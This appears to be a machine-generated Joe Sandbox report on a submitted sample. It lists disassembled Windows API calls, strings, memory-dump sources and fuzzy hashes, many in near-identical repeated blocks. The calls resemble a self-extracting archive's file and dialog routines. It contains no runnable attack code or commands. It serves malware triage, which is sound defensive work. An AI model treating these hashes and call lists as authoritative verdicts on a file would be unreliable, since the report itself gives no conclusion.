                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b7bb618d522bbbfc15b0f316e953129870d4bd922b33c3027332f40a6253f2ba
                                                              • Instruction ID: 3acfbb1ce933dfd6b0086581fcf8a5eaee4be8899558c6d306f419ee11b840ba
                                                              • Opcode Fuzzy Hash: b7bb618d522bbbfc15b0f316e953129870d4bd922b33c3027332f40a6253f2ba
                                                              • Instruction Fuzzy Hash: F2B092A125A100BC2108A1061802D3A0248C189F1A730A42FBC04D20C2D84C4A06093B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 18c36318d6031283afeef8c7df4581086d8ef103a371007bf076b80d024f91cd
                                                              • Instruction ID: 21f9b80571ad19aa15faa444a21c036cb4265ae3b106880c9f16dfb12a8a55df
                                                              • Opcode Fuzzy Hash: 18c36318d6031283afeef8c7df4581086d8ef103a371007bf076b80d024f91cd
                                                              • Instruction Fuzzy Hash: EEA001E66AA252BD310862536D56D3B025DC5C9B2AB30A52FFC25A64C2AC88194A187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9f47002ecf1c430c51656366b1298eeb7818c81044895317ea6fbd562a849c3c
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 9f47002ecf1c430c51656366b1298eeb7818c81044895317ea6fbd562a849c3c
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4efa503b40189eacee973350bb5f6e77a6574fc1ea6bdf6578b7bf13f9e4a4eb
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 4efa503b40189eacee973350bb5f6e77a6574fc1ea6bdf6578b7bf13f9e4a4eb
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4bc42370e3dc8b1b4421ba2dd859e3b234b17607e64453dce37e9616b3a37b85
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 4bc42370e3dc8b1b4421ba2dd859e3b234b17607e64453dce37e9616b3a37b85
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 53cdf931889147b3b35c70d5158e082fa3f04a90f11d548c2bc09b1c315f63df
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 53cdf931889147b3b35c70d5158e082fa3f04a90f11d548c2bc09b1c315f63df
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: be8d2a322341236d4de7157a46a584140ece6f3558ba5e12e595eac0795fff42
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: be8d2a322341236d4de7157a46a584140ece6f3558ba5e12e595eac0795fff42
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0042903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00429F0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              • Opcode ID: 43baba364e5cf6eb77f1a0bae5e594cdcf225e9185015fbc91bc1b35ec03f088
                                                              • Instruction ID: d1c3197d52a2b9d76e44631a5660fd6d1f6504444cff8f29b6cad86d1bf2d139
                                                              • Opcode Fuzzy Hash: 43baba364e5cf6eb77f1a0bae5e594cdcf225e9185015fbc91bc1b35ec03f088
                                                              • Instruction Fuzzy Hash: 70A0113008020A8A8E002B30CA0800E3B20EB22BC230002A8A00ACA0A2CB22880B8A00
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,0043AE72,C:\Users\user\Desktop,00000000,0046946A,00000006), ref: 0043AC08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: e0ff7ecbfbe52ad18c931015f6692ccf71c23d41cf15b390a180ec3c16d4dc69
                                                              • Instruction ID: e113185100ebd27bdac2c7cfc2aa6e9e708510479f5afa86aa7eb9f638dd578d
                                                              • Opcode Fuzzy Hash: e0ff7ecbfbe52ad18c931015f6692ccf71c23d41cf15b390a180ec3c16d4dc69
                                                              • Instruction Fuzzy Hash: F5A011302002008B82000F328F0AA0EBAAAAFA2B82F00C038A08080030CB30C820AA08
                                                              APIs
                                                              • CloseHandle.KERNELBASE(000000FF,?,?,004295D6,?,?,?,?,?,00452641,000000FF), ref: 0042963B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 59b26c4e63d8c1c877641f96e848808e283806c04fe82d4de79bbe0be2bf262c
                                                              • Instruction ID: e4b950ae509c64253ed3826844f2767a69cb80a1405f2745e8ab74610c5d6c2b
                                                              • Opcode Fuzzy Hash: 59b26c4e63d8c1c877641f96e848808e283806c04fe82d4de79bbe0be2bf262c
                                                              • Instruction Fuzzy Hash: 21F0E930181B259FDB308A20D44879377E86B12321F441B1FD0E242AE0D3696D8D9A44
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0043C2B1
                                                              • EndDialog.USER32(?,00000006), ref: 0043C2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 0043C2E0
                                                              • SetFocus.USER32(00000000), ref: 0043C2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0043C321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0043C358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0043C36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0043C38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0043C39C
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0043C3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0043C3D4
                                                              • _swprintf.LIBCMT ref: 0043C404
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0043C417
                                                              • FindClose.KERNEL32(00000000), ref: 0043C41E
                                                              • _swprintf.LIBCMT ref: 0043C477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0043C48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0043C4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0043C4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0043C4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0043C4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0043C509
                                                              • _swprintf.LIBCMT ref: 0043C535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0043C548
                                                              • _swprintf.LIBCMT ref: 0043C59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0043C5AF
                                                                • Part of subcall function 0043AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0043AF35
                                                                • Part of subcall function 0043AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0045E72C,?,?), ref: 0043AF84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$PC$REPLACEFILEDLG
                                                              • API String ID: 797121971-800292204
                                                              • Opcode ID: 01f39eb7e200f546b80c7fc43a86fb2806e7804e580e994b0d03c406d3adccbf
                                                              • Instruction ID: a86dd6c8076143d6de5025e5a6fc0bbe403208d35086a44a3eb74ecf6361b001
                                                              • Opcode Fuzzy Hash: 01f39eb7e200f546b80c7fc43a86fb2806e7804e580e994b0d03c406d3adccbf
                                                              • Instruction Fuzzy Hash: 8091D572648344BBD221DFA0DC89FFB77ACEB49B05F40482EF645D6181D779EA04872A
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00426FAA
                                                              • _wcslen.LIBCMT ref: 00427013
                                                              • _wcslen.LIBCMT ref: 00427084
                                                                • Part of subcall function 00427A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00427AAB
                                                                • Part of subcall function 00427A9C: GetLastError.KERNEL32 ref: 00427AF1
                                                                • Part of subcall function 00427A9C: CloseHandle.KERNEL32(?), ref: 00427B00
                                                                • Part of subcall function 0042A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641,000000FF), ref: 0042A1F1
                                                                • Part of subcall function 0042A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641), ref: 0042A21F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00427139
                                                              • CloseHandle.KERNEL32(00000000), ref: 00427155
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00427298
                                                                • Part of subcall function 00429DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004273BC,?,?,?,00000000), ref: 00429DBC
                                                                • Part of subcall function 00429DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00429E70
                                                                • Part of subcall function 00429620: CloseHandle.KERNELBASE(000000FF,?,?,004295D6,?,?,?,?,?,00452641,000000FF), ref: 0042963B
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A501
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3983180755-3508440684
                                                              • Opcode ID: 5b3ad1833a5700119e1bf89eb8a20df47cf1452b9c2a241884393650cb3d55fc
                                                              • Instruction ID: dd93a4991183b27fcc151d5c98afbbc035956054be5a11d054d83f2b117d474d
                                                              • Opcode Fuzzy Hash: 5b3ad1833a5700119e1bf89eb8a20df47cf1452b9c2a241884393650cb3d55fc
                                                              • Instruction Fuzzy Hash: 99C1EA71A04624AADB21DB75EC41FEFB3A8AF04344F40455FF956E3282D738AA44CB69
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 3e9eba96815001e895c17f5d6edae3fccf801edadd7a21f9caa6dabb630f8bea
                                                              • Instruction ID: 43356909924e8acf8875cb3a5a82a17f7844a09906820ae04e9bf7e2a43fcc14
                                                              • Opcode Fuzzy Hash: 3e9eba96815001e895c17f5d6edae3fccf801edadd7a21f9caa6dabb630f8bea
                                                              • Instruction Fuzzy Hash: 82C24871E086288FEB25CE299D407EAB7B5FB48305F1441EBD84DE7241E778AE818F45
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog_swprintf
                                                              • String ID: CMT$h%u$hc%u
                                                              • API String ID: 146138363-3282847064
                                                              • Opcode ID: 847f019d5384544eade39b8d317b6da42749736b2f3acb16bc2273ec2d2f3e13
                                                              • Instruction ID: e6cb333b016104d60eae0b2c75421d9ac4efca7bdca6049377629cadfeeba4b1
                                                              • Opcode Fuzzy Hash: 847f019d5384544eade39b8d317b6da42749736b2f3acb16bc2273ec2d2f3e13
                                                              • Instruction Fuzzy Hash: 993206716002949BDB14DF75D895AEA3BA5AF14304F84047FFD8A8B282DB7CAA49CB14
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00422874
                                                              • _strlen.LIBCMT ref: 00422E3F
                                                                • Part of subcall function 004302BA: __EH_prolog.LIBCMT ref: 004302BF
                                                                • Part of subcall function 00431B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0042BAE9,00000000,?,?,?,00010484), ref: 00431BA0
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00422F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 1206968400-2756464174
                                                              • Opcode ID: 4ae93c7bff45487fa0e56e54d968c9c12bf214ca87108eb51138e02bd9573b32
                                                              • Instruction ID: 9c6623a3ded838ead9464bd28996db601287a1314fc007ebdc819a61e91fffae
                                                              • Opcode Fuzzy Hash: 4ae93c7bff45487fa0e56e54d968c9c12bf214ca87108eb51138e02bd9573b32
                                                              • Instruction Fuzzy Hash: 3A6228717002549FDB19DF34E9856EA3BA1AF14304F48457FEC9A8B382D7BCA945CB28
                                                              APIs
